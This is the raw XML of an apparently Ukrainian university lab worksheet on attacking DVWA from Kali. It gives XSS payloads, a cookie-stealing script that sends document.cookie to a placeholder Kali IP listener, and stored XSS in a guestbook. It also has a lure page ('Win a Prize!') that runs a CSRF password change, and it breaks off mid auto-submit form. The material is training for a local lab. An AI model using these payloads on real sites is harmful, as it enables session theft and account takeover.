      <w:r w:rsidRPr="00E5371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E5371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B4DF66" w14:textId="05C47C27" w:rsidR="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719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Спробуйте різні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payloads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9EA7531" w14:textId="10729C17" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E537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IMG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тег з </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onerror:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECE76B6" w14:textId="6B37B602" w:rsidR="00E53719" w:rsidRPr="00C63D08" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror="alert('XSS')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013ED838" w14:textId="7349A479" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E537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SVG:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21476B36" w14:textId="11165657" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;svg onload="alert('XSS')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC03F21" w14:textId="6CEB11CA" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E5371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Тег </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543C2AC2" w14:textId="7C00B9B7" w:rsidR="00E53719" w:rsidRPr="00E53719" w:rsidRDefault="00E53719" w:rsidP="00E53719">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;body onload="alert('XSS')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE0B437" w14:textId="07860A89" w:rsidR="00E53719" w:rsidRDefault="00F56CE4" w:rsidP="00F56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6CE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Завдання 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Крадіжка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F56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FC6C1B" w14:textId="3F68480A" w:rsidR="00F56CE4" w:rsidRPr="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE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Отримайте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Kali (172.17.*.*):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790E0EDB" w14:textId="0F747E49" w:rsidR="00F56CE4" w:rsidRPr="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ifconfig |grep inet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF7A004" w14:textId="4DE619B1" w:rsidR="00F56CE4" w:rsidRPr="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE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Налаштуйте прослуховувач у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB67ECB" w14:textId="77777777" w:rsidR="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t># У терміналі Kali створіть простий HTTP сервер</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A820147" w14:textId="4DAF108D" w:rsidR="00F56CE4" w:rsidRPr="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>python3 -m http.server 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770E8169" w14:textId="03EC6E10" w:rsidR="00F56CE4" w:rsidRPr="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE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Виконайте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крадіжки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookies</w:t>
      </w:r>
      <w:r w:rsidR="007107FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (в розділі </w:t>
      </w:r>
      <w:r w:rsidR="007107FE"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="007107FE" w:rsidRPr="007107FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007107FE"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="007107F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56CE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1B8B7" w14:textId="501ACAB0" w:rsidR="00F56CE4" w:rsidRPr="00C63D08" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:r>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r>
        <w:t>YOUR</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>KALI</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:8888/</w:t>
      </w:r>
      <w:r>
        <w:t>steal</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>='+</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5370079C" w14:textId="4CF31DFC" w:rsidR="00F56CE4" w:rsidRPr="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE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Перевірте </w:t>
      </w:r>
      <w:r w:rsidRPr="00F56CE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56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сервер – має з’явитися запит з </w:t>
      </w:r>
      <w:r w:rsidRPr="00F56CE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cookies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766DB" w14:textId="638E8677" w:rsidR="00F56CE4" w:rsidRDefault="007107FE" w:rsidP="00F56C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07FE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016E7539" wp14:editId="115E23C2">
            <wp:extent cx="5648325" cy="111698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3915" cy="112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97DE3" w14:textId="72EF8FEE" w:rsidR="007107FE" w:rsidRPr="007107FE" w:rsidRDefault="007107FE" w:rsidP="00F56C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1 – Приклад викрадення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</w:p>
    <w:p w14:paraId="21406A76" w14:textId="0284D212" w:rsidR="00E53719" w:rsidRDefault="00F56CE4" w:rsidP="00F56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6CE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Завдання 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Stored</w:t>
      </w:r>
      <w:r w:rsidRPr="00710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атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B9C62" w14:textId="33760746" w:rsidR="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE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до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F56C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Stored</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56C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C43867" w14:textId="7D92B053" w:rsidR="00F56CE4" w:rsidRPr="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE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полі </w:t>
      </w:r>
      <w:r w:rsidR="007107FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Message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введіть:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E40E51" w14:textId="445E1D6F" w:rsidR="00F56CE4" w:rsidRPr="00C63D08" w:rsidRDefault="00F56CE4" w:rsidP="00E237E1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert('Stored XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264696FA" w14:textId="38AAC574" w:rsidR="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE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полі </w:t>
      </w:r>
      <w:r w:rsidR="007107FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Name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введіть довільний текст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6263CB5D" w14:textId="7DCC27D8" w:rsidR="00F56CE4" w:rsidRPr="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE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Натисніть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sign Guestbook.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086CA692" w14:textId="00908FE7" w:rsidR="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="007107FE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Оновіть сторінку –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виконатися автоматично для всіх користувачів.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BFCFCD" w14:textId="5C74C5B0" w:rsidR="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="007107F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CE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Очистіть шкідливі записи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розділі </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56CE4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Reset</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56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A886D1" w14:textId="67F1EF0B" w:rsidR="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE4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CE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</w:t>
      </w:r>
      <w:r w:rsidR="002B648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56CE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>-атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363D6DB4" w14:textId="77777777" w:rsidR="00F56CE4" w:rsidRPr="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine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до 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 w:rsidRPr="00F56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F56CE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCCAF8F" w14:textId="37E2B726" w:rsidR="00F56CE4" w:rsidRPr="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine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Змініть пароль через легітимний інтерфейс:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CC12BE" w14:textId="77777777" w:rsidR="00F56CE4" w:rsidRPr="00C63D08" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>New password: test123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F7D094" w14:textId="77777777" w:rsidR="00F56CE4" w:rsidRPr="00C63D08" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Confirm new password: test123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C179C3" w14:textId="0F98EC92" w:rsidR="00F56CE4" w:rsidRPr="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Натисніть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621EDD74" w14:textId="6B9D3E55" w:rsidR="00F56CE4" w:rsidRDefault="00F56CE4" w:rsidP="00F56CE4">
      <w:pPr>
        <w:pStyle w:val="a3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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56CE4"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запиту (перевірте адресний рядок або </w:t>
      </w:r>
      <w:r w:rsidRPr="00F56CE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Network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6CE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tab</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56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56CE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DevTools</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56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6CE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56CE4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C3B3085" w14:textId="41DC251D" w:rsidR="005245BC" w:rsidRPr="005245BC" w:rsidRDefault="00F56CE4" w:rsidP="005245BC">
      <w:pPr>
        <w:pStyle w:val="a3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F56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створіть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файл з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експлойтом</w:t>
      </w:r>
      <w:r w:rsidR="005245BC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редактора </w:t>
      </w:r>
      <w:r w:rsidR="005245BC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="005245B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BF062C3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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6009A4A9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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFECEB8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&lt;head&gt;&lt;title&gt;Win a Prize!&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064D5532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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCA0573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&lt;h1&gt;Congratulations! Click to claim your prize!&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64400602" w14:textId="4F231DFB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&lt;img src=x onerror="this.src='</w:t>
      </w:r>
      <w:r w:rsidR="00405B9F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/vulnerabilities/csrf/?password_new=hacked123&amp;password_conf=hacked123&amp;Change=Change#'; this.removeAttribute('onerror');"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073376E3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&lt;p&gt;Loading your prize...&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C64951D" w14:textId="77777777" w:rsidR="005245BC" w:rsidRDefault="005245BC" w:rsidP="005245BC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3BD776" w14:textId="3588B0CA" w:rsidR="005245BC" w:rsidRPr="005245BC" w:rsidRDefault="005245BC" w:rsidP="005245BC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F6713C" w14:textId="3E75D71A" w:rsidR="005245BC" w:rsidRPr="005245BC" w:rsidRDefault="005245BC" w:rsidP="005245BC">
      <w:pPr>
        <w:pStyle w:val="a3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Запустіть веб-сервер для хостингу експлойту:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD3231" w14:textId="49C9CB39" w:rsidR="005245BC" w:rsidRPr="00C63D08" w:rsidRDefault="005245BC" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 -m http.server 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A0D127" w14:textId="591AE706" w:rsidR="005245BC" w:rsidRPr="007107FE" w:rsidRDefault="005245BC" w:rsidP="005245BC">
      <w:pPr>
        <w:pStyle w:val="a3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новій вкладці браузера </w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali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 ви залогінені в </w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DVWA)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відкрийте:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1808C607" w14:textId="0B03CBDE" w:rsidR="007107FE" w:rsidRPr="00674968" w:rsidRDefault="005245BC" w:rsidP="00674968">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB443ED" w14:textId="1F85D542" w:rsidR="007107FE" w:rsidRDefault="007107FE" w:rsidP="007107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4430693" wp14:editId="1E3C9085">
            <wp:extent cx="5921891" cy="20288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256" cy="203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1E042" w14:textId="40BEBDA3" w:rsidR="007107FE" w:rsidRDefault="007107FE" w:rsidP="007107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2 – Приклад реалізації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атаки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714508B8" w14:textId="23A1C2A0" w:rsidR="005245BC" w:rsidRPr="005245BC" w:rsidRDefault="005245BC" w:rsidP="007107FE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Пароль користувача має змінитися на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hacked</w:t>
      </w:r>
      <w:r w:rsidRPr="005245BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>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атака спрацювала. Якщо ні – перегляньте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Network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консолі розробника браузера, і перегляньте дані кукі запиту, який ви відправляєте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D5767" w14:textId="78B0FC07" w:rsidR="005245BC" w:rsidRDefault="005245BC" w:rsidP="00F56CE4">
      <w:pPr>
        <w:pStyle w:val="a3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Перевірте: вийдіть з </w:t>
      </w:r>
      <w:r w:rsidRPr="005245BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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спробуйте увійти з новим паролем </w:t>
      </w:r>
      <w:r w:rsidRPr="005245BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hacked</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63D08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>123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C18185" w14:textId="4FF97E1C" w:rsidR="005245BC" w:rsidRDefault="005245BC" w:rsidP="005245BC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2B648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5245B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968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Auto-submit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CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00674968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> атака.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B594BB" w14:textId="5377FC95" w:rsidR="005245BC" w:rsidRPr="005245BC" w:rsidRDefault="005245BC" w:rsidP="005245B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Створіть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en-US"/>
        </w:rPr>
        <w:t>auto</w:t>
      </w:r>
      <w:r w:rsidRPr="005245B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submit</w:t>
      </w:r>
      <w:r w:rsidRPr="0052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формою за допомогою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5245BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F0631B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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2116A474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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAFBEF8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&lt;head&gt;&lt;title&gt;Survey&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3E2AB6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>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F97F07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&lt;h1&gt;Quick Survey - Please wait...&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028B1394" w14:textId="373724E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&lt;form id="csrf" action="http://</w:t>
      </w:r>
      <w:r w:rsidR="00405B9F">
        <w:rPr>
          <w:lang w:val="en-US"/>
